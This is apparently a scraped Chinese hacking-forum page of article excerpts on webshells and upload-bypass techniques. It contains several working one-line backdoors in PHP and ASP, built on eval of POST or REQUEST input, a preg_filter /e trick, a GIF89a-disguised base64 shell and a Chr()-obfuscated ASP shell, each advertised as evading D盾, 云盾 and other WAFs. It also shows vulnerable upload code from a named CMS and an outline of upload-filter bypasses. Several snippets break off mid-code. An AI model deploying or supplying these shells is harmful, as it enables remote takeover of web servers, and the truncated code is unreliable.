aspx 反射后门

首先将test.aspx上传支持aspx的网站

http://www.xxx.com/test.aspx

打开后显示

会显示网站应用的根路径


Windows、Linux后门合集解析

CKnife java版本的中国菜刀 可过各种waf狗

CKnife java版本菜刀

万众电子期刊在线阅读系统后台上传漏洞

再次拿到了万众电子期刊在线阅读系统。搭建测试,修复了前台的SQL注入以及XSS跨站。有留言的地方增加了验证码.
后台查看上传的过程admin\includes\upload.inc.php

<?php
header('content-Type:text/html;charset=UTF-8');
require '../../includes/other.fun.php';
require '../../includes/file.fun.php';
$input=$_GET['input'];
$form=$_GET['form'];
$dir=$_GET['dir'];//目录
$text=$_GET['text'];
$type=$_GET['type'];
?>

D盾的软肋 最新过D盾一句话

<?php $str_tmp = "eval"; $str_tmp .= "(";$str_tmp .= "$";$str_tmp .= "_PO";$str_tmp .= "ST[1]);";@eval($str_tmp); ?>

今日要分享的一句话:

<?php $ad = '|';$ad .='.';$ad .='*|';$ad .='e';@preg_filter('|.*|e', $_REQUEST['1'], ''); ?>

原创过狗php一句话

GIF89a
<?
$ran = 'cmFuZ2U=';
$ran1 = 'ba'.'se'.'64'.'_decode';
$int = $ran1($ran);
$int1 = $int(0,200);
$ch = 'c&#39

多种文件上传漏洞演示

相信大家都或多或少遇到过无法突破上传的问题,本文只讲突破方法,想看原理请点击下方的公开课地址
(文章结尾有原理讲解及多种绕过视频地址)
讲解目录:JS验证实例 /大小写/双重后缀名/过滤绕过/特殊后缀名/文件流类型/文件重写

过狗shell文件管理


过狗shell文件管理

asp过狗一句话

<%
i=(Chr(-12590))
love=(Chr(-20306))
you=(Chr(-15133))
OK=i&love&you
CNM=Request(OK)
eVal CNM 'pass:我爱你
%>

asp过狗一句话中文版的哦

过云盾、D盾各种盾php shell

<?php
 
//过云盾、D盾各种盾shell
$id = $_GET['id'];
//debug
echo $catid = isset($_GET['catid'])?base64_decode($_GET['catid']):'';
$s = '';